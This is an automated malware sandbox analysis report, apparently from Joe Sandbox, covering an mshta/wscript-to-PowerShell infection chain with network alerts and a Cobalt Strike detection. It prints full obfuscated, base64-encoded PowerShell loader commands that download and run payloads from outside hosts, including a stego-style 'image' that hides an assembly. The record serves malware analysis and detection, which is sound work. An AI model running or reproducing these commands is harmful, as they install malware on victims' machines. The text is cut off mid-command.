          Source: Binary string: System.pdb source: powershell.exe, 00000009.00000002.1840311611.0000000007B14000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_c0da534e38c01f4dJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\OneCoreUAPCommonProxyStub.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\OneCoreCommonProxyStub.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\sppc.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_c0da534e38c01f4d\COMCTL32.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\dxcore.dllJump to behavior

          Software Vulnerabilities

          barindex
          Suspicious execution chain found
          Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.4:49730 -> 23.95.128.215:80
          Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1Host: 3105.filemail.comConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 193.30.119.205 193.30.119.205
          Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: global trafficHTTP traffic detected: GET /226/seethepossiblethingsforentiretimetogivemebest.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 23.95.128.215Connection: Keep-Alive
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
          Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1Host: 3105.filemail.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /226/seethepossiblethingsforentiretimetogivemebest.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 23.95.128.215Connection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: 3105.filemail.com
          Source: powershell.exe, 00000001.00000002.1811106062.00000000049F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.95.128.215/226/seethep
          Source: powershell.exe, 00000001.00000002.1819843824.000000000726C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.128.215/226/seethepossiblethingsforentiretimetogivemebest.tIF
          Source: powershell.exe, 00000001.00000002.1819843824.000000000726C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.128.215/226/seethepossiblethingsforentiretimetogivemebest.tIFPb
          Source: powershell.exe, 00000001.00000002.1819843824.000000000726C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.128.215/226/seethepossiblethingsforentiretimetogivemebest.tIFlb;
          Source: powershell.exe, 00000009.00000002.1820142065.00000000056EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3105.filemail.com
          Source: powershell.exe, 00000009.00000002.1841164664.0000000007BAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
          Source: powershell.exe, 00000001.00000002.1828783287.00000000080F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820146724.00000000072E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
          Source: powershell.exe, 00000003.00000002.1699204987.0000000004EF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
          Source: powershell.exe, 00000009.00000002.1820142065.00000000056EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip.3105.filemail.com
          Source: powershell.exe, 00000001.00000002.1817137670.0000000005907000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1701451021.0000000005E08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1836439427.00000000062F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000009.00000002.1820142065.00000000053E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000003.00000002.1699204987.0000000004EF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: powershell.exe, 00000001.00000002.1811106062.00000000048A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1699204987.0000000004DA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1848545841.0000000004C38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1820142065.0000000005291000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000003.00000002.1699204987.0000000004EF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: powershell.exe, 00000009.00000002.1820142065.00000000053E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000009.00000002.1816997416.00000000033F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1820142065.00000000053E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://3105.file
          Source: powershell.exe, 00000009.00000002.1820142065.00000000053E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://3105.filemail.com
          Source: powershell.exe, 00000009.00000002.1820142065.00000000053E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNd
          Source: powershell.exe, 00000001.00000002.1811106062.00000000048A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1699204987.0000000004DA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1848545841.0000000004C29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1848545841.0000000004C38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1820142065.0000000005291000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
          Source: powershell.exe, 00000003.00000002.1699204987.0000000004EF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
          Source: powershell.exe, 00000009.00000002.1836439427.00000000062F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000009.00000002.1836439427.00000000062F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000009.00000002.1836439427.00000000062F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000009.00000002.1820142065.00000000053E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000001.00000002.1811106062.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1820142065.0000000005AD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
          Source: powershell.exe, 00000007.00000002.1856532641.0000000007270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.cH
          Source: powershell.exe, 00000001.00000002.1820146724.000000000731C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
          Source: powershell.exe, 00000001.00000002.1817137670.0000000005907000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1701451021.0000000005E08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1836439427.00000000062F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownHTTPS traffic detected: 193.30.119.205:443 -> 192.168.2.4:49731 version: TLS 1.2

          System Summary

          barindex
          Detected Cobalt Strike Beacon
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYsTEM32\WiNdoWspOwERsHEll\V1.0\pOweRSHELL.eXE" "pOwERshELl.exE -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE ; IeX($(IEx('[SYstEm.TExt.ENcODING]'+[Char]58+[cHAr]0X3A+'Utf8.geTSTRInG([sYsteM.cOnVert]'+[cHAr]0X3A+[CHaR]0x3A+'FroMbaSE64STRINg('+[cHAr]0x22+'JEJ5byAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CRVJEZUZpTklUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeU56eG4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRZdVksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRalVXbHdkYUNaVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0EpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImNUbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5cWFMV2ZtcCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRCeW86OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4xMjguMjE1LzIyNi9zZWV0aGVwb3NzaWJsZXRoaW5nc2ZvcmVudGlyZXRpbWV0b2dpdmVtZWJlc3QudElGIiwiJEVOdjpBUFBEQVRBXHNlZXRoZXBvc3NpYmxldGhpbmdzZm9yZW50aXJldGltZXRvZ2l2ZW1lYmVzdC52QnMiLDAsMCk7c3RBclQtc0xlZXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzZWV0aGVwb3NzaWJsZXRoaW5nc2ZvcmVudGlyZXRpbWV0b2dpdmVtZWJlc3QudkJzIg=='+[cHar]34+'))')))"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnaEdhaW1hZ2VVcmwgPSBEZndodHRwczovLzMxMDUuZmlsZScrJ21haWwuY29tL2FwaS8nKydmaWxlL2dldD9maScrJ2xla2V5PXNoVFAnKydIYkNQWDhvLWxPJysndENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBEZnc7aEdhd2ViQ2xpZW50ICcrJz0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtoR2EnKydpbWFnZUJ5dGVzID0gaEdhd2ViQ2xpZW50LkQnKydvd25sb2FkJysnRGF0YShoR2FpbWFnZVVybCk7aEdhaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaEdhaW1hZ2VCeXRlcyk7aEdhc3RhcnRGbGFnID0gRGZ3PDxCQVNFNjRfU1RBUlQ+PkRmdztoR2FlbmRGbGFnID0gRGYnKyd3PDxCQVNFNjRfRU5EPj5EZnc7aEdhc3RhcnRJbmRleCA9IGhHYWltYWdlVGV4dCcrJy5JbmRleE9mKGhHYXN0YXJ0RmxhZyk7aEdhZW5kSW5kZXggPSBoR2FpbWFnZVRleHQuSW5kZXhPZicrJyhoR2FlbmRGbGFnKTtoR2FzdGFydEluZGV4IC1nZSAwIC1hbmQgaEdhZW5kSW5kZXggLWd0IGhHYXMnKyd0YXJ0SW5kZXg7aEdhc3RhcnRJbmRleCArPSBoR2FzdGFydEYnKydsYWcuTGVuZ3RoO2hHYWJhc2U2NExlbmd0aCA9IGhHYWVuZEluZGV4IC0gaEdhc3RhcicrJ3RJbmRleDtoR2FiYXNlNjRDb21tYW5kID0gaEdhaW1hZ2VUZXh0LlN1YnN0cmluZyhoR2FzdGEnKydydEluZGV4LCBoR2FiYXNlNjRMZW5ndGgpO2hHYWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGhHYWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBOOVkgRm9yRWFjaC1PYmplY3QgeyBoR2FfIH0pWy0xLi4tKGhHYWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aEdhY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhoR2FiJysnYScrJ3NlNjRSZXZlcnNlZCk7aEdhbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKGhHYWNvbW1hbmRCeXRlcyk7aEdhdmFpTScrJ2V0aG9kID0gW2RubGliLklPJysnLkhvbWVdLkdldE1ldGhvZCgnKydEZndWQUlEZncpO2hHYXZhaU1ldGhvZC5JbnZva2UoaEdhbnVsbCwgQChEZnd0eHQuUlRDQ0NSVi82MjIvNTEyLjgyMS41OS4zMi8vOnB0dGhEZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2FzcG5ldF9jb21waWxlckRmdywgRGZ3ZGVzYXRpdmFkb0RmdywgRGZ3ZGVzYXRpdicrJ2FkbycrJ0RmdyxEZndkZXNhdGl2YWRvRGZ3LERmd2Rlc2F0aXZhZG9EZncsRGZ3ZGVzYXRpdmFkb0RmdyxEZndkZXNhJysndGl2YWRvRGZ3LERmd2Rlc2F0aXZhZG9EZncsRGZ3MURmdyxEZndkJysnZXNhdGl2YWRvRGZ3KSk7JykgIC1jUkVwTEFDRShbQ2hhcl02OCtbQ2hhcl0xMDIrW0NoYXJdMTE5KSxbQ2hhcl0zOS1jUkVwTEFDRSAgJ045WScsW0NoYXJdMTI0LVJlUExBQ0UgIChbQ2hhcl0xMDQrW0NoYXJdNzErW0NoYXJdOTcpLFtDaGFyXTM2KXwgLiggJGVOdjpjb21zUEVjWzQsMjQsMjVdLUpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('hGaimageUrl = Dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shTP'+'HbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Dfw;hGawebClient '+'= New-Object System.Net.WebClient;hGa'+'imageBytes = hGawebClient.D'+'ownload'+'Data(hGaimageUrl);hGai'+'mageText = [System.Text.Encoding]::UTF8.GetString(hGaimageBytes);hGastartFlag = Dfw<<BASE64_START>>Dfw;hGaendFlag = Df'+'w<<BASE64_END>>Dfw;hGastartIndex = hGaimageText'+'.IndexOf(hGastartFlag);hGaendIndex = hGaimageText.IndexOf'+'(hGaendFlag);hGastartIndex -ge 0 -and hGaendIndex -gt hGas'+'tartIndex;hGastartIndex += hGastartF'+'lag.Length;hGabase64Length = hGaendIndex - hGastar'+'tIndex;hGabase64Command = hGaimageText.Substring(hGasta'+'rtIndex, hGabase64Length);hGabase64Reversed = -join (hGabase64Command.ToCharArray() N9Y ForEach-Object { hGa_ })[-1..-(hGabase64Command.Length)];hGacommandBytes = [System.Convert]::F'+'romBase64String(hGab'+'a'+'se64Reversed);hGaloadedAssembly = [System.Reflection.Assembly]::Load(hGacommandBytes);hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod('+'DfwVAIDfw);hGavaiMethod.Invoke(hGanull, @(Dfwtxt.RTCCCRV/622/512.821.59.32//:ptthDfw, DfwdesativadoDfw, DfwdesativadoDfw, DfwdesativadoDfw, Dfwaspnet_compilerDfw, DfwdesativadoDfw, Dfwdesativ'+'ado'+'Dfw,DfwdesativadoDfw,DfwdesativadoDfw,DfwdesativadoDfw,Dfwdesa'+'tivadoDfw,DfwdesativadoDfw,Dfw1Dfw,Dfwd'+'esativadoDfw));') -cREpLACE([Char]68+[Char]102+[Char]119),[Char]39-cREpLACE 'N9Y',[Char]124-RePLACE ([Char]104+[Char]71+[Char]97),[Char]36)| .( $eNv:comsPEc[4,24,25]-JoIn'')"
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYsTEM32\WiNdoWspOwERsHEll\V1.0\pOweRSHELL.eXE" "pOwERshELl.exE -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE ; IeX($(IEx('[SYstEm.TExt.ENcODING]'+[Char]58+[cHAr]0X3A+'Utf8.geTSTRInG([sYsteM.cOnVert]'+[cHAr]0X3A+[CHaR]0x3A+'FroMbaSE64STRINg('+[cHAr]0x22+'JEJ5byAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CRVJEZUZpTklUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeU56eG4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRZdVksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRalVXbHdkYUNaVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0EpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImNUbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5cWFMV2ZtcCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRCeW86OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4xMjguMjE1LzIyNi9zZWV0aGVwb3NzaWJsZXRoaW5nc2ZvcmVudGlyZXRpbWV0b2dpdmVtZWJlc3QudElGIiwiJEVOdjpBUFBEQVRBXHNlZXRoZXBvc3NpYmxldGhpbmdzZm9yZW50aXJldGltZXRvZ2l2ZW1lYmVzdC52QnMiLDAsMCk7c3RBclQtc0xlZXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzZWV0aGVwb3NzaWJsZXRoaW5nc2ZvcmVudGlyZXRpbWV0b2dpdmVtZWJlc3QudkJzIg=='+[cHar]34+'))')))"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXEJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnaEdhaW1hZ2VVcmwgPSBEZndodHRwczovLzMxMDUuZmlsZScrJ21haWwuY29tL2FwaS8nKydmaWxlL2dldD9maScrJ2xla2V5PXNoVFAnKydIYkNQWDhvLWxPJysndENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBEZnc7aEdhd2ViQ2xpZW50ICcrJz0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtoR2EnKydpbWFnZUJ5dGVzID0gaEdhd2ViQ2xpZW50LkQnKydvd25sb2FkJysnRGF0YShoR2FpbWFnZVVybCk7aEdhaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaEdhaW1hZ2VCeXRlcyk7aEdhc3RhcnRGbGFnID0gRGZ3PDxCQVNFNjRfU1RBUlQ+PkRmdztoR2FlbmRGbGFnID0gRGYnKyd3PDxCQVNFNjRfRU5EPj5EZnc7aEdhc3RhcnRJbmRleCA9IGhHYWltYWdlVGV4dCcrJy5JbmRleE9mKGhHYXN0YXJ0RmxhZyk7aEdhZW5kSW5kZXggPSBoR2FpbWFnZVRleHQuSW5kZXhPZicrJyhoR2FlbmRGbGFnKTtoR2FzdGFydEluZGV4IC1nZSAwIC1hbmQgaEdhZW5kSW5kZXggLWd0IGhHYXMnKyd0YXJ0SW5kZXg7aEdhc3RhcnRJbmRleCArPSBoR2FzdGFydEYnKydsYWcuTGVuZ3RoO2hHYWJhc2U2NExlbmd0aCA9IGhHYWVuZEluZGV4IC0gaEdhc3RhcicrJ3RJbmRleDtoR2FiYXNlNjRDb21tYW5kID0gaEdhaW1hZ2VUZXh0LlN1YnN0cmluZyhoR2FzdGEnKydydEluZGV4LCBoR2FiYXNlNjRMZW5ndGgpO2hHYWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGhHYWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBOOVkgRm9yRWFjaC1PYmplY3QgeyBoR2FfIH0pWy0xLi4tKGhHYWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aEdhY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhoR2FiJysnYScrJ3NlNjRSZXZlcnNlZCk7aEdhbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKGhHYWNvbW1hbmRCeXRlcyk7aEdhdmFpTScrJ2V0aG9kID0gW2RubGliLklPJysnLkhvbWVdLkdldE1ldGhvZCgnKydEZndWQUlEZncpO2hHYXZhaU1ldGhvZC5JbnZva2UoaEdhbnVsbCwgQChEZnd0eHQuUlRDQ0NSVi82MjIvNTEyLjgyMS41OS4zMi8vOnB0dGhEZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2FzcG5ldF9jb21waWxlckRmdywgRGZ3ZGVzYXRpdmFkb0RmdywgRGZ3ZGVzYXRpdicrJ